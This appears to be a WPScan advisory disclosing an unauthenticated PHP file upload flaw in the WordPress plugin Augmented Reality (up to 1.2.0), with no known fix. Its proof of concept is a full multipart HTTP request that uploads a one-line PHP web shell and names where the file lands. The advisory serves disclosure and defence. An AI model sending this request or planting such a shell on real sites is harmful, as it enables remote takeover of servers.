WordPress Plugin Vulnerabilities
Augmented Reality <= 1.2.0 - Unauthenticated PHP File Upload leading to RCE
Description
The elFinder connector used allows upload of PHP files as the 'uploadAllow' options contains 'text/x-php'. This allows an unauthenticated user to upload PHP files, leading to a RCE vulnerability.
The issue is similar to https://wpscan.com/vulnerability/10389
Proof of Concept
POST /wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php HTTP/1.1 Host: 192.168.1.134 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------42474892822150178483835528074 Content-Length: 737 Connection: close Cookie: PHPSESSID=8940b45029f28b38e8339bae4dd10b18 -----------------------------42474892822150178483835528074 Content-Disposition: form-data; name="reqid" 1744f7298611ba -----------------------------42474892822150178483835528074 Content-Disposition: form-data; name="cmd" upload -----------------------------42474892822150178483835528074 Content-Disposition: form-data; name="target" l1_Lw -----------------------------42474892822150178483835528074 Content-Disposition: form-data; name="upload[]"; filename="robbie3.php" Content-Type: application/php <?php system($_GET['cmd']); ?> -----------------------------42474892822150178483835528074 Content-Disposition: form-data; name="mtime[]" 1597850374 -----------------------------42474892822150178483835528074-- ``` File ends up /wp-content/plugins/augmented-reality/file_manager/robbie3.php
Affects Plugins
No known fix References
Miscellaneous
Original Researcher
Robert Wiggins
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2020-11-05 (about 3 years ago)
Added
2020-11-05 (about 3 years ago)
Last Updated
2021-03-23 (about 2 years ago)
WPScan 